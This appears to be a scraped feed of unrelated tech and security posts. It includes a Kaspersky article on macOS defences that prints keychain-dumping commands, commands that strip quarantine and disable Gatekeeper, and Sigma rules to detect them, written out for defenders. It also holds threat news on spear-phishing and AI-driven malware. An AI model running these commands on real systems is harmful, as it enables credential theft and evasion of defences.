The Advanced Project Gemini Concepts That Could Have Been
Looking back on the trajectory leading to Project Apollo and the resulting Moon missions, one can be forgiven for thinking that this was a strict and well-defined plan that was being executed, especially considering the absolute time crunch. The reality is that much of this trajectory was in flux, with the earlier Project Gemini seeing developments towards supplying manned space stations and even its own Moon missions. [Spaceflight Histories] recently examined some of these Advanced Gemini concepts that never came to pass.
In retrospect, some of these seem like an obvious evolution of the program. Given both NASA and the US Air Force’s interest in space stations at the time, the fact that a up-sized “Big Gemini” was proposed as a resupply craft makes sense. Not to be confused with the Gemini B, which was a version of the spacecraft that featured an attached laboratory module. Other concepts, like the paraglider landing feature, were found to be too complex and failure prone.
The circumlunar, lunar landing and Apollo rescue concepts were decidedly more ambitious and included a range of alternatives to the Project Apollo missions, which were anything but certain especially after the Apollo 1 disaster. Although little of Advanced Gemini made it even into a prototype stage, it’s still a fascinating glimpse at an alternate reality.
youtube.com/embed/nth7pS7_mLk?…
Iran Cyber Army: spear-phishing contro i governi di mezzo mondo (Italia inclusa!)
Una recente analisi di Cyber Threat Intelligence (CTI) condotta da DREAM ha svelato i dettagli di una complessa campagna di spear-phishingavvenuta nell’agosto 2025. L’attacco, attribuito a un gruppo allineato all’Iran, noto come Homeland Justice, ha sfruttato un’infrastruttura già compromessa per raggiungere obiettivi sensibili a livello globale. La peculiarità di questa operazione risiede nell’utilizzo di un account di posta elettronica violato appartenente al Ministero degli Affari Esteri dell’Oman, che ha fornito una copertura di legittimità per le comunicazioni malevole.
ezstandalone.cmd.push(function () { ezstandalone.showAds(604); });
Le e-mail di phishing contenevano un allegato dannoso, un documento di Microsoft Word, che rappresentava il primo anello della catena di infezione. All’interno di questo file si nascondeva una macro VBA (Visual Basic for Applications) appositamente codificata per eludere i controlli di sicurezza standard. Una volta attivata, la macro procedeva con la decodifica e l’installazione di un payload, un file eseguibile battezzato come sysProcUpdate.exe, che rappresentava il cuore dell’attacco informatico.
Il malware sysProcUpdate.exe era progettato per svolgere un’attività di ricognizione dettagliata del sistema compromesso. Il suo compito principale era quello di raccogliere metadati specifici del sistema, tra cui informazioni sulla configurazione e sui software installati. Questi dati venivano successivamente crittografati per garantirne la riservatezza e poi trasmessi in modo sicuro a un server di comando e controllo (C2), da cui gli aggressori potevano gestire la campagna e ricevere le informazioni esfiltrate.
ezstandalone.cmd.push(function () { ezstandalone.showAds(612); });
Per sfuggire ai sistemi di difesa e all’analisi, gli attaccanti hanno implementato diverse tecniche di evasione sofisticate. Hanno occultato la propria origine instradando il traffico attraverso un nodo di uscita VPN in Giordania, rendendo difficile la loro localizzazione. Inoltre, il payload dannoso veniva scritto in un file con estensione .log, un formato di file generalmente non associato al malware, con l’obiettivo di eludere i controlli automatici. L’uso di ritardi nel codice contribuiva ulteriormente a confondere i sistemi di analisi comportamentale.
I principali obiettivi di questa campagna erano istituzioni diplomatiche e governative. L’attacco ha preso di mira entità in un’ampia varietà di aree geografiche, inclusi il Medio Oriente, l’Africa, l’Europa, l’Asia e le Americhe. Per l’Europa i paesi colpiti sono Italia, Francia Romania, Spagna, Paesi Bassi, Ungheria, Germania, Austria, e Svezia. La campagna dimostra una chiara preferenza per obiettivi di alto valore, mirati a ottenere informazioni strategiche attraverso l’accesso a reti di governi e organizzazioni internazionali, sottolineando la natura politica o geopolitica della minaccia.
Per mitigare l’attacco, gli esperti di sicurezza consigliano diverse contromisure tecniche. La prima e più immediata è il blocco degli Indicatori di Compromissione (IOC), come gli indirizzi IP dei server C2 e gli hash dei file dannosi. Un’altra raccomandazione cruciale è il monitoraggio proattivo delle richieste POST sospette dirette ai server C2 e la verifica delle modifiche al registro di Windows, che possono segnalare l’attività del malware.
Tra le altre misure di mitigazione, viene sottolineata l’importanza di imporre la sicurezza delle macro nei programmi di Office per prevenire l’esecuzione di codice arbitrario. Si suggerisce inoltre di condurre un’analisi approfondita del traffico VPN in uscita, al fine di identificare eventuali flussi di dati anomali. Infine, l’implementazione della segmentazione della rete è vista come una difesa efficace per limitare la propagazione del malware e ridurre l’impatto di attacchi simili in futuro.
L'articolo Iran Cyber Army: spear-phishing contro i governi di mezzo mondo (Italia inclusa!) proviene da il blog della sicurezza informatica.
Hackaday Podcast Episode 335: Beer, Toast, and Pi
What happens when you listen in on Elliot Williams and Al Williams? You get a round up of the best of last week’s Hackaday posts, of course. The topics this week range from beer brewing to lightning protection, with a little bit of everything in between.
This week, many problems find solutions. Power drill battery dead? Your car doesn’t have a tire pressure monitor? Does your butter tear up your toast? You can find the answer to these problems, and more, on the Hackaday podcast.
For the can’t miss section, the guys are annoyed that Google wants to lock down their phones, and also talk about measuring liquid levels in outer space.
Check out the links below if you want to follow along, and as always, tell us what you think about this episode in the comments!
html5-player.libsyn.com/embed/…
Or download in DRM-free MP3 without requiring developer registration.
Where to Follow Hackaday Podcast
Places to follow Hackaday podcasts:
Episode 335 Show Notes:
News:
- Confirmation Of Record 220 PeV Cosmic Neutrino Hit On Earth
- Tons of entries for the One Hertz challenge!
What’s that Sound?
- Al made short work of the sound this week. See if you can guess and if you can, you might win a coveted Hackaday Podcast T-shirt.
Interesting Hacks of the Week:
- Automated Brewing
- How To Stop Zeus From Toasting Your Pi
- Battery Repair By Reverse Engineering
- Wire Photo Fax Teardown
- JuiceBox Rescue: Freeing Tethered EV Chargers From Corporate Overlords
- RP2040 Assembly Language Mix And Match
Quick Hacks:
- Elliot’s Picks:
- Homebrew Tire Pressure Monitoring System
- Troubled USB Device? This Tool Can Help
- Butta Melta Stops Rock-solid Butter From Tearing Your Toast
- Al’s Picks:
Can’t-Miss Articles:
- The Browser Wasn’t Enough, Google Wants To Control All Your Software
- Where There Is No Down: Measuring Liquid Levels In Space
hackaday.com/2025/08/29/hackad…
La Cina presenta KylinOS11 con AI Integrata: il sistema operativo nazionale che sostituirà Windows
La Cina ha presentato KylinOS 11 , il più grande aggiornamento del suo sistema operativo nazionale, che il governo ha definito un importante passo avanti nella creazione di un ecosistema tecnologico indipendente. La nuova versione gira sul kernel Linux 6.6 ed è compatibile con processori AMD e Intel, nonché con otto CPU cinesi, molte delle quali utilizzano architetture di comando proprietarie. Il sistema supporta anche sette schede video nazionali e può funzionare con acceleratori AMD e Nvidia.
ezstandalone.cmd.push(function () { ezstandalone.showAds(604); });
Il lancio ha riguardato immediatamente le versioni desktop e server,aggiungendo un assistente AI integrato, il supporto del protocollo di contesto del modello, l’integrazione cloud e funzionalità di sicurezza avanzate.
Secondo il presidente di KylinSoft, Chen Zhihua, KylinOS è già il sistema operativo nazionale più utilizzato in Cina, con 16 milioni di installazioni. Si tratta di una quota modesta a livello nazionale, ma i media statali hanno descritto il lancio come un passaggio da una “piattaforma di supporto funzionale” a una “base di connessione intelligente”.
ezstandalone.cmd.push(function () { ezstandalone.showAds(612); });
È interessante notare che la scelta del kernel potrebbe sollevare interrogativi. La versione 6.6 ha ricevuto lo stato LTS nel 2023, ma il suo supporto terminerà a dicembre 2026, appena 16 mesi dopo il rilascio di KylinOS 11.
Tuttavia, questo non rappresenta un precedente per gli sviluppatori: la precedente versione di KylinOS 10, rilasciata nel 2020, era basata sul kernel 4.19, il cui supporto è terminato nel 2024, ovvero molto prima che il sistema stesso venisse interrotto.
La presentazione di KylinOS 11 è stata un evento importante per l’industria IT cinese.
Durante l’evento, i rappresentanti delle principali aziende tecnologiche del Paese hanno promesso pubblicamente di supportare la distribuzione e l’implementazione della nuova versione del sistema operativo.
Allo stesso tempo, The Register ha osservato che non ci sono ancora informazioni sul supporto di KylinOS 11 per le alternative nazionali a Bluetooth e HDMI, proposte dalla Cina lo scorso anno. Forse la loro integrazione sarà un compito da affrontare nelle versioni future.
L'articolo La Cina presenta KylinOS11 con AI Integrata: il sistema operativo nazionale che sostituirà Windows proviene da il blog della sicurezza informatica.
Breakout Boards for the Blind
Connecting an LED to a battery seems trivial. If you have any knowledge of using breadboards, knowing that red goes with red, and that black goes with black, it’s as easy as tying your shoes. Except there’s one problem: what if you can’t see the difference between red and black? [Tara] had a student who struggled with a problem just like this, so of course, they made a whole suite of breakout boards to the rescue!
Breadboards rely almost completely on the visual cues of rows, columns, and if the part is even in the hole correctly. [Tara] fixed these issues while attempting to keep the usefulness of a breadboard. Using tactile cues rather than the traditional visual, a visually impaired individual can figure out what is positive or negative.
Braille is the obvious choice for general communication of inputs and outputs. Where [Tara]’s ingenuity came in was the method of incorporating Braille into the boards — solder joints. After reading a Hackaday article on solder Braille, [Tara] managed a fitting and efficient method of allowing ease of use.
Currently, the boards are in a prototyping stage; however, if you want to try them out yourself early, let [Tara] know. Others with visual impairments are needed to properly stress test the device. If you are someone who does not struggle with any major visual impairments, it can be hard to put yourself in their shoes. For those empathic (and with VR capabilities) among us, be sure to try it yourself!
This Week in Security: DEF CON Nonsense, Vibepwned, and 0-days
DEF CON happened just a few weeks ago, and it’s time to cover some of the interesting talks. This year there were two talks in particular that are notable for being controversial. Coincidentally both of these were from Track 3. The first was the Passkeys Pwned, a talk by SquareX about how the passkey process can be hijacked by malware.
[Dan Goodin] lays out both the details on Passkeys, and why the work from SquareX isn’t the major vulnerability that they claim it is. First, what is a Passkey? Technically it’s a public/private keypair that is stored by the user’s browser. A unique keypair is generated for each new website, and the site stores the public key. To authenticate with the Passkey, the site generates a random string, the browser signs it with the private key, and the site checks it against the public key. I stand by my early opinion, that Passkeys are effectively just passwords, but with all the best-practices mandated.
So what is the claim presented at DEF CON? Malicious code running in the context of the browser tab can hijack the passkey process. In the demonstrated attack flow, a browser extension caused the Passkey login to fail, and prompted the user to generate a new Passkey. This is an interesting observation, and a clever attack against Passkeys, but is not a vulnerability in the Passkey spec. Or more accurately, it’s an accepted limitation of Passkeys, that they cannot guarantee security in the presence of a compromised browser.
That Wasn’t the Sketchiest DEF CON Talk
There was another suspect presentation: A talk on DragonSlayer, a framework to de-obfuscate virtualized malware. This topic is super interesting, diving into the world of highly obfuscated malware. Imagine a binary that internally implements an interpreter runs the actual program code from a bytecode format. As a researcher, this sort of obfuscation is very time consuming to wade through.
The approach from DragonSlayer is to observe the malware, look for known patterns, and feed the observations into a machine learning tool.
If that sounds a bit like a meme, with the steps going: 1) AI, 2) ???, 3) Profit. And this is where we get to the reaction from at least part of the security community. The term “AI slop” is thrown around. The repository doesn’t compile, portions of the code are no-ops with comments about what the real code would look like, and some recent commits look like attempts to remove the tell-tale sings of AI authorship.
Ransomware in the cloud
There’s a new trend in ransomware attacks, to move away from on-premise and encryption, and to instead attack cloud data. This is based on a report from Microsoft, detailing the activities of Storm-0501. That threat actor has begun chaining on-premises attacks into Azure takeover.
Azure has plenty of bandwidth, and an attacker isn’t on the hook to pay for it, so the approach here is to firehose all of that data off-site, and then delete every scrap possible. In cases where the permissions don’t allow deletion, new keys are created, proving that the encryption approach isn’t dead yet.
AI Malware
Let’s talk AI Malware. Up first is PromptLock, a find by ESET. Rather than being found in an active exploit, ESET researchers found this as an upload to VirusTotal, and suspect that it’s a proof of concept.
That concept is to skip shellcode, and instead just include malicious prompts in the malware. Upon execution, the malware sends the embedded prompts off to an Ollama API, and asks for malicious Lua code back.
PromptLock seemed like a proof of concept, but there was a different, live malware campaign this week, that made use of a compromised nx library delivered via npm. This one creates a repository named s1ngularity-repository if it’s running in a GitHub context. It also looks for Claude or Gemini on the system, and if found, runs a malicious prompt instructing the agentic LLM to look for local secrets.
0-days
Pssst, hey kid, I hear you like 0-days. We’ve got 0-days this week. First up, FreePBX. The administrative control panel has a flaw that allows an attacker to run any command as the underlying Asterisk user. The earliest that this attack has been seen in logs was August 21, and any FreePBX system with the admin panel exposed to the Internet could be compromised.
Researchers at at watchTowr caught wind of a vulnerability in CrushFTP that allowed attackers admin access to the server over HTTPS. This one was being exploited in the wild even before the patch was released. Rather than do their normal patch reverse engineering, the watchTowr team put their Attacker Eye honeypot to work. They added a CrushFTP module to the mix, and sat back to wait for the incoming attack. The Internet didn’t disappoint, and it turns out this is a very odd race condition between login attempts.
The Passwordstate credentials manager also has a pair of vulnerabilities fixed in a recent update, though it doesn’t appear that they are actually 0-days, nor yet exploited in the wild. This one seems to allow unauthorized access to the administrative interface via the Emergency Access page.
Bits and Bytes
Trail of Bits performed a security assessment of the WhatsApp apps and backend infrastructure. They found about 28 separate issues, with the most serious getting fixed. Kudos to Meta and Trail of Bits for publishing the whole report.
And finally, there’s a clever technique showing up on Linux malware. Encoding a malicious command as part of the filename. The attack starts with a .rar. It drops a file with the malicious name, with the hope that it will be processed by a backup or similar script. The end-game is a rootkit with remote access. Be careful what you download!
Il supercomputer Dawn scende in campo contro il cancro: una nuova era della ricerca assieme alle AI
Il progetto “Un modello di base per la progettazione di vaccini contro il cancro” è stato selezionato per un premio dalla prestigiosa iniziativa AI Research Resource (AIRR) del governo britannico, guidata dal Dipartimento per la Scienza, l’Innovazione e la Tecnologia (DSIT) e da UK Research and Innovation (UKRI).
ezstandalone.cmd.push(function () { ezstandalone.showAds(604); });
Il progetto riceverà 10.000 ore GPU sul Dawn Supercomputer , uno dei supercomputer di intelligenza artificiale più veloci del Regno Unito.
Il Dott. Lennard Lee, Professore Associato presso il Centro di Immuno-Oncologia e co-responsabile del progetto, ha dichiarato:
ezstandalone.cmd.push(function () { ezstandalone.showAds(612); });
“Crediamo che Oxford possa guidare una nuova era di scoperte nella cura del cancro, rendendo i trattamenti più sicuri, più precisi e più efficaci attraverso l’uso di tecnologie all’avanguardia. La progettazione di vaccini contro il cancro si trova ad affrontare uno dei maggiori colli di bottiglia nello sviluppo: l’accesso a infrastrutture di calcolo ad alte prestazioni. Con uno dei supercomputer di intelligenza artificiale più veloci del Regno Unito ora a nostra disposizione, scoperte che un tempo richiedevano anni ora potrebbero richiedere solo poche settimane “.
Michael Bryan, studente e dottorato presso il Centre for Immuno-Oncology, ha dichiarato:
“È un vero privilegio lavorare a Oxford con il supporto di Cancer Research UK. Il nostro team sta sviluppando modelli di base di intelligenza artificiale specializzati per accelerare la scoperta di bersagli per vaccini salvavita contro il cancro ” .
Il progetto, realizzato dal Dipartimento di Medicina di Nuffield, sfrutterà set di dati sui tumori disponibili al pubblico per fare scoperte su molteplici sottotipi di cancro e contribuire all’Oxford Neoantigen Atlas, una piattaforma ad accesso aperto a supporto della ricerca sui vaccini contro il cancro in tutto il Regno Unito.
Questo lavoro fa parte di un più ampio sforzo nazionale per accelerare le capacità scientifiche del Regno Unito, trasformate dall’accesso alla potenza di supercalcolo dell’intelligenza artificiale, per inaugurare una nuova era di immunologia e scoperta di vaccini.
youtube.com/embed/BZQ5i8UrSgk?…
Il programma AIRR, guidato da DSIT e UKRI, sta investendo oltre 1 miliardo di sterline per aumentare di 20 volte la capacità di calcolo nazionale entro il 2030, consentendo una ricerca audace e basata sui dati nei settori pubblico e privato. Questo premio allinea gli scienziati di Oxford all’ambizione del governo di fare della Gran Bretagna un leader globale nell’intelligenza artificiale, nella scienza e nell’innovazione sanitaria.
L'articolo Il supercomputer Dawn scende in campo contro il cancro: una nuova era della ricerca assieme alle AI proviene da il blog della sicurezza informatica.
No Die? No Problem: RealDice.org Has You Covered
Have you ever been out and about and needed to make a check against INT, WIS or CON but not had a die handy? Sure, you could use an app on your phone, but who knows what pseudorandom nonsense that’s getting up to. [Lazy Hovercraft] has got the solution with his new site RealDice.org, which, well, rolls real dice.
Well, one die, anyway. The webpage presents a button to roll a single twenty-sided die, or “Dee-Twenty” as the cool kids are calling it these days. The rolling is provided by a unit purchased from Amazon that spins the die inside a plastic bubble, similar to this unit we covered back in 2020. (Alas for fans of the venerable game Trouble, it does not pop.) The die spinner’s button has been replaced by a relay, which is triggered from the server whenever a user hits the “roll” button.
You currently have to look at the camera feed with your own eyes to learn what number was rolled, but [Lazy Hovercraft] assures us that titanic effort will be automated once he trains up the CVE database. To that end you are encouraged to help build the dataset by punching in what number is shown on the die.
This is a fun little hack to get some physical randomness, and would be great for the sort of chatroom tabletop gaming that’s so common these days. It may also become the new way we select the What’s That Sound? winners on the Hackaday Podcast.
Before sitting down for a game session, you might want to make sure you’re all using fair dice. No matter how fair the dice, its hard to beat quantum phenomena for random noise.
How attackers adapt to built-in macOS protection
If a system is popular with users, you can bet it’s just as popular with cybercriminals. Although Windows still dominates, second place belongs to macOS. And this makes it a viable target for attackers.
With various built-in protection mechanisms, macOS generally provides a pretty much end-to-end security for the end user. This post looks at how some of them work, with examples of common attack vectors and ways of detecting and thwarting them.
Overview of macOS security mechanisms
Let’s start by outlining the set of security mechanisms in macOS with a brief description of each:
- Keychain – default password manager
- TCC – application access control
- SIP – ensures the integrity of information in directories and processes vulnerable to attacks
- File Quarantine – protection against launching suspicious files downloaded from the internet
- Gatekeeper – ensures only trusted applications are allowed to run
- XProtect – signature-based anti-malware protection in macOS
- XProtect Remediator – tool for automatic response to threats detected by XProtect
Keychain
Introduced back in 1999, the password manager for macOS remains a key component in the Apple security framework. It provides centralized and secure storage of all kinds of secrets: from certificates and encryption keys to passwords and credentials. All user accounts and passwords are stored in Keychain by default. Access to the data is protected by a master password.
Keychain files are located in the directories ~/Library/Keychains/, /Library/Keychains/ and /Network/Library/Keychains/. Besides the master password, each of them can be protected with its own key. By default, only owners of the corresponding Keychain copy and administrators have access to these files. In addition, the files are encrypted using the reliable AES-256-GCM algorithm. This guarantees a high level of protection, even in the event of physical access to the system.
However, attacks on the macOS password manager still occur. There are specialized utilities, such as Chainbreaker, designed to extract data from Keychain files. With access to the file itself and its password, Chainbreaker allows an attacker to do a local analysis and full data decryption without being tied to the victim’s device. What’s more, native macOS tools such as the Keychain Access GUI application or the /usr/bin/security command-line utility can be used for malicious purposes if the system is already compromised.
So while the Keychain architecture provides robust protection, it is still vital to control local access, protect the master password, and minimize the risk of data leakage outside the system. Below is an example of a Chainbreaker command:
python -m chainbreaker -pa test_keychain.keychain -o output
As mentioned above, the security utility can be used for command line management, specifically the following commands:
security list-keychains– displays all available Keychain files
Keychain files available to the user
security dump-keychain -a -d– dumps all Keychain files
Keychain file dump
security dump-keychain ~/Library/Keychains/login.keychain-db– dumps a specific Keychain file (a user file is shown as an example)
To detect attacks of this type, you need to configure logging of process startup events. The best way to do this is with the built-in macOS logging tool, ESF. This allows you to collect necessary events for building detection logic. Collection of necessary events using this mechanism is already implemented and configured in Kaspersky Endpoint Detection and Response (KEDR).
Among the events necessary for detecting the described activity are those containing the security dump-keychain and security list-keychains commands, since such activity is not regular for ordinary macOS users. Below is an example of an EDR triggering on a Keychain dump event, as well as an example of a detection rule.
Example of an event from Kaspersky EDR
Sigma:
title: Keychain access
description: This rule detects dumping of keychain
tags:
- attack.credential-access
- attack.t1555.001
logsource:
category: process_creation
product: macos
detection:
selection:
cmdline: security
cmdline:
-list-keychains
-dump-keychain
condition: selection
falsepositives:
- Unknow
level: medium
SIP
System Integrity Protection (SIP) is one of the most important macOS security mechanisms, which is designed to prevent unauthorized interference in critical system files and processes, even by users with administrative rights. First introduced in OS X 10.11 El Capitan, SIP marked a significant step toward strengthening security by limiting the ability to modify system components, safeguarding against potential malicious influence.
The mechanism protects files and directories by assigning special attributes that block content modification for everyone except trusted system processes, which are inaccessible to users and third-party software. In particular, this makes it difficult to inject malicious components into these files. The following directories are SIP-protected by default:
/System/sbin/bin/usr(except/usr/local)/Applications(preinstalled applications)/Library/Application Support/com.apple.TCC
A full list of protected directories is in the configuration file /System/Library/Sandbox/rootless.conf. These are primarily system files and preinstalled applications, but SIP allows adding extra paths.
SIP provides a high level of protection for system components, but if there is physical access to the system or administrator rights are compromised, SIP can be disabled – but only by restarting the system in Recovery Mode and then running the csrutil disable command in the terminal. To check the current status of SIP, use the csrutil status command.
Output of the csrutil status command
To detect this activity, you need to monitor the csrutil status command. Attackers often check the SIP status to find available options. Because they deploy csrutil disable in Recovery Mode before any monitoring solutions are loaded, this command is not logged and so there is no point in tracking its execution. Instead, you can set up SIP status monitoring, and if the status changes, send a security alert.
Example of an event from Kaspersky EDR
Sigma:
title: SIP status discovery
description: This rule detects SIP status discovery
tags:
- attack.discovery
- attack.t1518.001
logsource:
category: process_creation
product: macos
detection:
selection:
cmdline: csrutil status
condition: selection
falsepositives:
- Unknow
level: low
TCC
macOS includes the Transparency, Consent and Control (TCC) framework, which ensures transparency of applications by requiring explicit user consent to access sensitive data and system functions. TCC is structured on SQLite databases (TCC.db), located both in shared directories (/Library/Application Support/com.apple.TCC/TCC.db) and in individual user directories (/Users/<username>/Library/Application Support/com.apple.TCC/TCC.db).
Contents of a table in the TCC database
The integrity of these databases and protection against unauthorized access are implemented using SIP, making it impossible to modify them directly. To interfere with these databases, an attacker must either disable SIP or gain access to a trusted system process. This renders TCC highly resistant to interference and manipulation.
TCC works as follows: whenever an application accesses a sensitive function (camera, microphone, geolocation, Full Disk Access, input control, etc.) for the first time, an interactive window appears with a request for user confirmation. This allows the user to control the extension of privileges.
TCC access permission window
A potential vector for bypassing this mechanism is TCC Clickjacking – a technique that superimposes a visually altered window on top of the permissions request window, hiding the true nature of the request. The unsuspecting user clicks the button and grants permissions to malware. Although this technique does not exploit TCC itself, it gives attackers access to sensitive system functions, regardless of the level of protection.
Example of a superimposed window
Attackers are interested in obtaining Full Disk Access or Accessibility rights, as these permissions grant virtually unlimited access to the system. Therefore, monitoring changes to TCC.db and managing sensitive privileges remain vital tasks for ensuring comprehensive macOS security.
File Quarantine
File Quarantine is a built-in macOS security feature, first introduced in OS X 10.5 Tiger. It improves system security when handling files downloaded from external sources. This mechanism is analogous to the Mark-of-the-Web feature in Windows to warn users of potential danger before running a downloaded file.
Files downloaded through a browser or other application that works with File Quarantine are assigned a special attribute (com.apple.quarantine). When running such a file for the first time, if it has a valid signature and does not arouse any suspicion of Gatekeeper (see below), the user is prompted to confirm the action. This helps prevent running malware by accident.
Example of file attributes that include the quarantine attribute
To get detailed information about the com.apple.quarantine attribute, use the xattr -p com.apple.quarantine <File name> command. The screenshot below shows an example of the output of this command:
0083– flag for further Gatekeeper actions689cb865– timestamp in hexadecimal format (Mac Absolute Time)Safari– browser used to download the file66EA7FA5-1F9E-4779-A5B5-9CCA2A4A98F5– UUID attached to this file. This is needed to database a record of the file
Detailed information about the com.apple.quarantine attribute
The information returned by this command is stored in a database located at ~/Library/Preferences/com.apple.LaunchServices.QuarantineEventsV2, where it can be audited.
Data in the com.apple.LaunchServices.QuarantineEventsV2 database
To avoid having their files quarantined, attackers use various techniques to bypass File Quarantine. For example, files downloaded via curl, wget or other low-level tools that are not integrated with File Quarantine are not flagged with the quarantine attribute.
Bypassing quarantine using curl
It is also possible to remove the attribute manually using the xattr -d com.apple.quarantine <filename> command.
Removing the quarantine attribute
If the quarantine attribute is successfully removed, no warning will be displayed when the file is run, which is useful in social engineering attacks or in cases where the attacker prefers to execute malware without the user’s knowledge.
Running a file without a File Quarantine check
To detect this activity, you need to monitor execution of the xattr command in conjunction with -d and com.apple.quarantine, which implies removal of the quarantine attribute. In an incident related to macOS compromise, also worth investigating is the origin of the file: if it got onto the host without being flagged by quarantine, this is an additional risk factor. Below is an example of an EDR triggering on a quarantine attribute removal event, as well as an example of a rule for detecting such events.
Example of an event from Kaspersky EDR
Sigma:
title: Quarantine attribute removal
description: This rule detects removal of the Quarantine attribute, that leads to avoid File Quarantine
tags:
- attack.defense-evasion
- attack.t1553.001
logsource:
category: process_creation
product: macos
detection:
selection:
cmdline: xattr -d com.apple.quarantine
condition: selection
falsepositives:
- Unknow
level: high
Gatekeeper
Gatekeeper is a key part of the macOS security system, designed to protect users from running potentially dangerous applications. First introduced in OS X Leopard (2012), Gatekeeper checks the digital signature of applications and, if the quarantine attribute (com.apple.quarantine) is present, restricts the launch of programs unsigned and unapproved by the user, thus reducing the risk of malicious code execution.
The spctl utility is used to manage Gatekeeper. Below is an example of calling spctl to check the validity of a signature and whether it is verified by Apple:
Spctl -a -t exec -vvvv <path to file>
Checking an untrusted file using spctl
Checking a trusted file using spctl
Gatekeeper requires an application to be:
- either signed with a valid Apple developer certificate,
- or certified by Apple after source code verification.
If the application fails to meet these requirements, Gatekeeper by default blocks attempts to run it with a double-click. Unblocking is possible, but this requires the user to navigate through the settings. So, to carry out a successful attack, the threat actor has to not only persuade the victim to mark the application as trusted, but also explain to them how to do this. The convoluted procedure to run the software looks suspicious in itself. However, if the launch is done from the context menu (right-click → Open), the user sees a pop-up window allowing them to bypass the block with a single click by confirming their intention to use the application. This quirk is used in social engineering attacks: malware can be accompanied by instructions prompting the user to run the file from the context menu.
Example of Chropex Adware using this technique
Let’s take a look at the method for running programs from the context menu, rather than double-clicking. If we double-click the icon of a program with the quarantine attribute, we get the following window.
Running a program with the quarantine attribute by double-clicking
If we run the program from the context menu (right-click → Open), we see the following.
Running a program with the quarantine attribute from the context menu
Attackers with local access and administrator rights can disable Gatekeeper using the spctl –master disable or --global-disable command.
To detect this activity, you need to monitor execution of the spctl command with parameters –master disable or --global-disable, which disables Gatekeeper. Below is an example of an EDR triggering on a Gatekeeper disable event, as well as an example of a detection rule.
Example of an Kaspersky EDR event
Sigma:
title: Gatekeeper disable
description: This rule detects disabling of Gatekeeper
tags:
- attack.defense-evasion
- attack.t1562.001
logsource:
category: process_creation
product: macos
detection:
selection:
cmdline: spctl
cmdline:
- '--master-disable'
- '--global-disable'
condition: selection
Takeaways
The built-in macOS protection mechanisms are highly resilient and provide excellent security. That said, as with any mature operating system, attackers continue to adapt and search for ways to bypass even the most reliable protective barriers. In some cases when standard mechanisms are bypassed, it may be difficult to implement additional security measures and stop the attack. Therefore, for total protection against cyberthreats, use advanced solutions from third-party vendors. Our Kaspersky EDR Expert and Kaspersky Endpoint Security detect and block all the threats described in this post. In addition, to guard against bypassing of standard security measures, use the Sigma rules we have provided.
Cos’è il Wetware: il futuro del potenziamento del cervello attraverso hardware e software
A livello di definizione, per wetware si intende quella tecnologia che combina hardware e software per potenziare le forme di vita biologiche. Steve M. Potter, è un professore associato presso il Laboratorio di neuroingegneria dell’Università della Georgia, ha predetto che è in arrivo una nuova rivoluzione.
ezstandalone.cmd.push(function () { ezstandalone.showAds(604); });
Ma tutto questo quando avverrà? In effetti sta già accadendo.
Cosa si intende per wetware
Dal 1996, Potter è stato coinvolto in una ricerca all’avanguardia sulle “possibilità di sviluppo della cognizione potenziata attraverso l’hardware nelle persone”. Infatti nel saggio “The future of computing and neural interfacing“, Potter descrive che tutta la vita come la conosciamo noi è fatta di cellule, che sono “morbide e piene di acqua salata”.
ezstandalone.cmd.push(function () { ezstandalone.showAds(612); });
Ecco perché i sistemi di controllo degli animali (reti di neuroni e cellule gliali) vengono talvolta definiti “wetware”, si tratta della base di tutta l’intelligenza naturale (NI). I computer e il digitale, al contrario, sono “secchi e duri”: l’hardware è il substrato su cui gira l’intelligenza artificiale (AI) di oggi.
Il Wetware opera (nella misura in cui lo comprendiamo) con regole molto diverse dall’hardware digitale. L’inevitabile percorso verso questo futuro ibrido neurale-sintetico sarà lastricato da una migliore comprensione del cervello e da migliori interfacce neurali oltre che a computer che emulano meglio la funzione cerebrale e di software e hardware neuromorfico specializzato, e quindi ispirato al cervello.
Ad esempio, l’apprendimento profondo (deep learning), è facilmente comprensibile come applicazione delle neuroscienze all’informatica e quindi fonte di ispirazione per una nuova generazione di software. Portando il tutto ad un livello successivo, non sarà solo il software a potenziare la nostra mente, ma anche hardware specializzato che potrà essere interessato in queste nuove tecnologie. Ad oggi ne le AI e ne le Neural Intelligence (NI) hanno davvero beneficiato dei sistemi ibridi hardware-wetware.
ezstandalone.cmd.push(function () { ezstandalone.showAds(613); });
Perchè no?
Perché i sistemi neurali viventi sono complessi e difficili da capire, per non parlare del relativo “reverse engineering”, se vogliamo fare una analogia con il mondo informatico. L’interfacciamento neurale è tecnicamente impegnativo. Ma il prof. Potter è fiducioso che il wetware-hardware un giorno, prima o poi, sarà comune e utile come lo sono oggi i computer digitali.
A differenza del calcolo quantistico, abbiamo molti esempi di dispositivi funzionanti che eseguono incredibili e miniaturizzate elaborazioni. Anche un cervello di una mosca è più potente ed efficiente dei migliori controllori di volo digitali che gli esseri umani hanno mai progettato.
ezstandalone.cmd.push(function () { ezstandalone.showAds(614); });
In che modo i cervelli realizzano imprese così sorprendenti di elaborazione dei sensori in tempo reale ed il controllo di movimenti così precisi in un così piccolo organismo?
Svelare i Misteri del Cervello per Creare Intelligenze Artificiali Ibride
C’è una forte motivazione per scoprire abbastanza segreti del cervello per creare nuove forme di intelligenza artificiale ibrida che sfruttino al massimo il calcolo digitale abbinato ad un cervello reale. È un po’ scioccante quanto male comprendiamo il cervello oggi, considerando quanto sia importante nelle nostre vite.
I neurobiologi non capiscono veramente cosa sia realmente un pensiero, da dove provengano i sentimenti, come siano immagazzinati i ricordi o come impariamo. Siamo in una fase equivalente alla comprensione vittoriana del sole: è probabile che ci siano concetti di funzione cerebrale che non possiamo ancora concepire, nello stesso modo in cui la fusione nucleare sbalordirebbe uno scienziato del XVIII secolo.
ezstandalone.cmd.push(function () { ezstandalone.showAds(615); });
Ma c’è motivo di ottimismo: il ritmo incalzante della neuro-ricerca accademica è stimolato dai finanziamenti dell’iniziativa Brain Research through Advancing Innovative Neurotechnologies (BRAIN) creata dall’amministrazione Obama e dallo Human Brain Project dell’UE.
I progressi avverranno quando questi sforzi si fonderanno con quelli dedicati alla creazione di sistemi di intelligenza artificiale migliori, come OpenAI, Google’s Deep Mind, IBM’s Watson e relativi progetti di AI su Facebook, Amazon, Microsoft, Baidu, ecc.
ezstandalone.cmd.push(function () { ezstandalone.showAds(616); });
Ma la comprensione incompleta del sistema nervoso e della NI non è una scusa per trattenersi dall’implementare qualche versione di ciò che sappiamo nei sistemi artificiali. L’immensa complessità del sistema nervoso può essere importante per fornire le potenti capacità di NI.
